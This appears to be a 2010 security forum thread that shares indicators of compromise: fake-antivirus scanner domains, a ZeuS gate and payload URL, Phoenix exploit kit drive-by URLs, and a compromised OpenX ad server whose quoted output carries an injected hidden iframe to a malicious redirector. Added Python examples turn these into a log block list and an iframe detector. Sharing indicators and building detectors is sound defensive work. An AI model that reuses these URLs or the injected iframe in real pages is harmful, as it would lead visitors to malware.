Author Topic: Malicious Domains - eoin.miller  (Read 12993 times)


June 18, 2010, 04:30:09 pm

eoin.miller

This thread is for the one-offs we find.

Fake Scanner Pages:
www2.routesave19.co.cc
www2.netguard37-pd.co.cc

http://www2.routesave19.co.cc/Images/loading.gif
http://www2.routesave19.co.cc/Layouts/Landings/CentralLandings/7/images/list/main_sprite.jpg

June 21, 2010, 04:24:58 pm
Reply #1

eoin.miller

FakeAV-infected clients POSTing to:

wellsellit.com

http://wellsellit.com/borders.php

June 22, 2010, 09:01:19 pm
Reply #2

eoin.miller

Exploited clients posting to:

lolopingtroll.org/stats/gate.php?id=84fefcb9

and pulling from:

pulselocums.com.au/media/sound.exe

VirusTotal says it's ZeuS:
http://www.virustotal.com/analisis/191d6ac238d6684a385380826bcf34f2698632c2ca9fbc57f4143b0310ea5cc0-1277240374

June 22, 2010, 09:10:09 pm
Reply #3

eoin.miller

Fake Scanners:

www1.softscaner35.co.cc
www1.softscaner36.co.cc
www2.newbless6.co.cc
www1.softscaner34.co.cc

All have the following URL accessible:
/Layouts/Landings/CentralLandings/7/images/list/main_sprite.jpg

June 25, 2010, 04:47:09 pm
Reply #4

eoin.miller

More fake scanner pages:

http://www1.trytocleanit-45p.co.cc
http://www1.avsolution31pr.co.cc
http://www2.lordofsave9.co.cc
http://www2.lordofsave4.co.cc

June 28, 2010, 05:08:03 pm
Reply #5

eoin.miller

Fake Scanners:

www1.glory4.co.cc
www1.glory3.co.cc

July 06, 2010, 06:50:01 pm
Reply #6

eoin.miller

Fake Scanner Pages:
www1.oksave9.co.cc

Redirectors to Fake Scanner Pages:
www3.avsolution42.co.cc

July 06, 2010, 08:36:49 pm
Reply #7

eoin.miller

FakeAV page:

http://antivirglass.com/purchase?pgid=2&r=57.5

July 09, 2010, 05:13:17 pm
Reply #8

eoin.miller

FakeAV:
http://business.one.strangled.net/3/?c=917

Redirects to FakeAV:
http://pivfeels.com/mytds/go.php?s=17

July 09, 2010, 05:27:29 pm
Reply #9

eoin.miller

Phoenix Exploit kit:

http://decorum76.info/e9t/

More domains on same IP with exploit kits:

decoy56.info/e9t/
extraditelbds.info/e9t/
erratic335.info/e9t/
magnatevhl8.info/q8s/
bristlejfgj8.info/e9t/
inclination19y.info/x0c/

July 13, 2010, 05:15:25 pm
Reply #10

eoin.miller

Drive-bys with very low detection rates (1/41):

http://domger.in/d/

VirusTotal Payload Results:
http://www.virustotal.com/analisis/1f75ef5ae8b8c0a8cc13242cd22a75c0e45f443b9a6fe8906287b9c1e6bbb3bb-1279005248

July 15, 2010, 04:58:06 pm
Reply #11

eoin.miller

Phoenix drive-by kits:

http://whetcb67.info/n21/ - drive-by
http://fglq.info/n2l/l.php?i=3 - payload

July 20, 2010, 10:11:44 pm
Reply #12

eoin.miller

http://333.gorgrengos.com/b/index.php - drive-by

September 01, 2010, 08:03:57 pm
Reply #13

eoin.miller

Drive-by:

www.hezhexh.co.cc/x33/

Seeing hacked forums redirect to this (via rpzrtru.co.cc/tds/in.cgi?default). Example of a hacked forum link that leads to this drive-by:

http://www.bicycles.net.au/forums/viewtopic.php?f=9&t=31289&start=25
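To put the indicators collected in this thread to use on a proxy log, here is an added example (not code from any of the posts above) that matches Squid native-format access-log lines against the hosts named in the thread and against the path fingerprints that recur across the posts: the fake-scanner sprite path from Reply #3, the ZeuS /stats/gate.php check-in from Reply #2, the /tds/in.cgi and /mytds/go.php redirectors, and the short directory names of the Phoenix kit URLs. The log lines are constructed; the Phoenix directory regex and the host www1.example42.co.cc are assumptions made for illustration, not indicators from the thread.

```python
"""Match Squid access-log lines against the indicators posted in this thread.

Added example, not from the original posts. The log lines are constructed;
the host lists and path fingerprints are taken from the thread, except where
a comment marks them as assumptions.
"""
import re
from urllib.parse import urlsplit

# Hosts named in the thread: fake scanners, the ZeuS gate and payload host,
# Phoenix kit domains, TDS redirectors.
BAD_HOSTS = {
    "www2.routesave19.co.cc", "www2.netguard37-pd.co.cc", "wellsellit.com",
    "lolopingtroll.org", "pulselocums.com.au", "www1.softscaner35.co.cc",
    "www1.softscaner36.co.cc", "www2.newbless6.co.cc", "www1.softscaner34.co.cc",
    "www1.trytocleanit-45p.co.cc", "www1.avsolution31pr.co.cc",
    "www2.lordofsave9.co.cc", "www2.lordofsave4.co.cc", "www1.glory4.co.cc",
    "www1.glory3.co.cc", "www1.oksave9.co.cc", "www3.avsolution42.co.cc",
    "antivirglass.com", "business.one.strangled.net", "pivfeels.com",
    "decorum76.info", "decoy56.info", "extraditelbds.info", "erratic335.info",
    "magnatevhl8.info", "bristlejfgj8.info", "inclination19y.info",
    "domger.in", "whetcb67.info", "fglq.info", "333.gorgrengos.com",
    "www.hezhexh.co.cc", "rpzrtru.co.cc",
}

# Path fingerprints that identify the kit or family regardless of host.
PATH_RULES = [
    ("fakeav-landing",
     re.compile(r"/Layouts/Landings/CentralLandings/\d+/images/list/main_sprite\.jpg$")),
    ("zeus-gate", re.compile(r"/stats/gate\.php(\?|$)")),
    ("tds-redirect", re.compile(r"/(tds/in\.cgi|mytds/go\.php)(\?|$)")),
    # Assumption: generalises the /e9t/, /q8s/, /x0c/, /n21/ directories seen
    # in the thread; it is a heuristic and will need tuning in practice.
    ("phoenix-dir", re.compile(r"^/[a-z]\d[a-z0-9]/$")),
]

# Squid native format: ts elapsed client action/code size method url ...
LOG_RE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+\d+\s+(?P<client>\S+)\s+\S+\s+\d+\s+"
    r"(?P<method>[A-Z]+)\s+(?P<url>\S+)"
)


def classify(method, url):
    """Return the indicator rules a single request matches, in rule order."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    hits = []
    if host in BAD_HOSTS:
        hits.append("known-bad-host")
    for name, rx in PATH_RULES:
        if rx.search(parts.path):
            hits.append(name)
    if "zeus-gate" in hits and method == "POST":
        hits.append("zeus-checkin")  # an infected client reporting in, not a visit
    return hits


def scan(lines):
    """Parse log lines and return (client, method, url, hits) for matches."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify(m["method"], m["url"])
        if hits:
            findings.append((m["client"], m["method"], m["url"], hits))
    return findings


# Constructed sample log; www1.example42.co.cc is a made-up host that only
# matches on the sprite path, the remaining entries use hosts from the thread.
SAMPLE_LOG = [
    "1277240374.101    512 10.0.0.5 TCP_MISS/200 1024 POST http://lolopingtroll.org/stats/gate.php?id=84fefcb9 - DIRECT/203.0.113.10 text/html",
    "1277240380.220   1540 10.0.0.5 TCP_MISS/200 98304 GET http://pulselocums.com.au/media/sound.exe - DIRECT/203.0.113.11 application/octet-stream",
    "1277812000.050    200 10.0.0.9 TCP_MISS/200 4096 GET http://www1.example42.co.cc/Layouts/Landings/CentralLandings/7/images/list/main_sprite.jpg - DIRECT/203.0.113.12 image/jpeg",
    "1283371000.300    300 10.0.0.12 TCP_MISS/302 512 GET http://rpzrtru.co.cc/tds/in.cgi?default - DIRECT/203.0.113.13 text/html",
    "1283371000.400    120 10.0.0.12 TCP_MISS/200 2048 GET http://www.bicycles.net.au/forums/viewtopic.php?f=9&t=31289 - DIRECT/203.0.113.14 text/html",
]

if __name__ == "__main__":
    for client, method, url, hits in scan(SAMPLE_LOG):
        print(client, method, url, ",".join(hits))
```

A POST to gate.php is the interesting hit: a GET could be a researcher or a crawler, but a POST with an id parameter is the bot itself checking in, so that client should be pulled for cleanup first. The sprite path rule catches fake-scanner hosts that were never listed, which is the point of the fingerprint in Reply #3.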

September 01, 2010, 08:34:35 pm
Reply #14

SysAdMini

Quote from: eoin.miller on September 01, 2010, 08:03:57 pm
Drive-by:

www.hezhexh.co.cc/x33/

Seeing hacked forums redirect to this (via rpzrtru.co.cc/tds/in.cgi?default). Example of a hacked forum link that leads to this drive-by:

http://www.bicycles.net.au/forums/viewtopic.php?f=9&t=31289&start=25

The OpenX ad server has been compromised.

http://www.bicycles.net.au/adserver/www/delivery/spc.php?zones=1|2|3
```javascript
var OA_output = new Array();
OA_output['1'] = '';

OA_output['2'] = '';

OA_output['3'] = '';
// Zone 3: the legitimate banner and its tracking beacon, followed by the injected 1x1 iframe to rpzrtru.co.cc
OA_output['3'] += "<"+"a href=\'http://www.bicycles.net.au/adserver/www/delivery/ck.php?oaparams=2__bannerid=20__zoneid=3__cb=82c8d8ab02__oadest=http%3A%2F%2Fwww.cyclechallenge.com%2FThe-Event-1%2FInternational-Riders%2FWin-a-trip-to-Cycle-Challenge%2Fdefault.aspx\' target=\'_blank\'><"+"img src=\'http://www.bicycles.net.au/adserver/www/images/b9e4c50eff89401296bf4b6e66125934.gif\' width=\'120\' height=\'80\' alt=\'Competition: Contact Lake Taupo Cycle Challenge\' title=\'Competition: Contact Lake Taupo Cycle Challenge\' border=\'0\' /><"+"/a><"+"div id=\'beacon_82c8d8ab02\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://www.bicycles.net.au/adserver/www/delivery/lg.php?bannerid=20&amp;campaignid=8&amp;zoneid=3&amp;cb=82c8d8ab02\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div><"+"iframe src=\"http://rpzrtru.co.cc/tds/in.cgi?default\" width=\"1\" height=\"1\" hspace=\"0\" vspace=\"0\" frameborder=\"0\" scrolling=\"no\"><"+"/iframe>\n";
```
Ruining the bad guy's day
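The spc.php output above is the kind of thing worth checking on a schedule if you run OpenX: the banner markup is delivered as a chain of "<"+"tag" JavaScript string fragments, and the compromise shows up as an extra iframe appended after the legitimate beacon. Here is an added example (not code from the post or from OpenX) that reassembles those fragments into HTML and flags any iframe that is 1x1 or smaller, hidden by style, or pointing at a host other than the ad server. SAMPLE_SPC is a constructed, abridged version of the response quoted above; the ad-server hostname is passed in by the caller.

```python
"""Flag hidden, tiny, or off-site iframes in OpenX spc.php delivery output.

Added example, not from the original post or from OpenX. SAMPLE_SPC is a
constructed, abridged copy of the spc.php response quoted in the thread.
"""
import re
from urllib.parse import urlsplit

# Constructed sample modelled on the quoted output: the real banner link,
# its hidden tracking beacon, and the injected 1x1 iframe appended at the end.
SAMPLE_SPC = r"""var OA_output = new Array();
OA_output['1'] = '';
OA_output['3'] = '';
OA_output['3'] += "<"+"a href=\'http://www.bicycles.net.au/adserver/www/delivery/ck.php?oaparams=2__bannerid=20\' target=\'_blank\'><"+"img src=\'http://www.bicycles.net.au/adserver/www/images/b9e4c50eff89401296bf4b6e66125934.gif\' width=\'120\' height=\'80\' border=\'0\' /><"+"/a><"+"div id=\'beacon_82c8d8ab02\' style=\'position: absolute; visibility: hidden;\'><"+"img src=\'http://www.bicycles.net.au/adserver/www/delivery/lg.php?bannerid=20\' width=\'0\' height=\'0\' /><"+"/div><"+"iframe src=\"http://rpzrtru.co.cc/tds/in.cgi?default\" width=\"1\" height=\"1\" frameborder=\"0\" scrolling=\"no\"><"+"/iframe>\n";
"""

JS_STRING_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')          # one double-quoted JS literal
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")


def decode_oa_output(js_text):
    """Join the "<"+"tag" string fragments of spc.php output back into HTML."""
    html = "".join(JS_STRING_RE.findall(js_text))
    # Undo the JS escaping OpenX applies inside the literals.
    return html.replace("\\'", "'").replace('\\"', '"').replace("\\n", "\n")


def _dimension(value):
    """Parse '1', '0px' or similar into an int; None when absent."""
    digits = re.sub(r"\D", "", value or "")
    return int(digits) if digits else None


def find_suspicious_iframes(js_text, ad_host):
    """Return iframes that are off-site, 1x1 or smaller, or hidden by style."""
    findings = []
    for m in IFRAME_RE.finditer(decode_oa_output(js_text)):
        attrs = {k.lower(): (dq or sq or bare)
                 for k, dq, sq, bare in ATTR_RE.findall(m.group(1))}
        src = attrs.get("src", "")
        host = (urlsplit(src).hostname or "").lower()
        reasons = []
        if host and host != ad_host.lower():
            reasons.append("off-site src")
        w, h = _dimension(attrs.get("width")), _dimension(attrs.get("height"))
        if w is not None and h is not None and w <= 1 and h <= 1:
            reasons.append("tiny frame (1x1 or smaller)")
        style = re.sub(r"\s+", "", attrs.get("style", "")).lower()
        if "visibility:hidden" in style or "display:none" in style:
            reasons.append("hidden by style")
        if reasons:
            findings.append({"src": src, "host": host, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_iframes(SAMPLE_SPC, "www.bicycles.net.au"):
        print(f["host"], f["src"], ", ".join(f["reasons"]))
```

Run it against the live spc.php URL for each zone you serve and alert on any finding; a legitimate OpenX banner may well use a hidden beacon div, but it has no business emitting an iframe to a .co.cc host. The same decoder works on the banner HTML stored in the OpenX database, which is where the injected markup usually lives after an admin-panel or file-upload compromise.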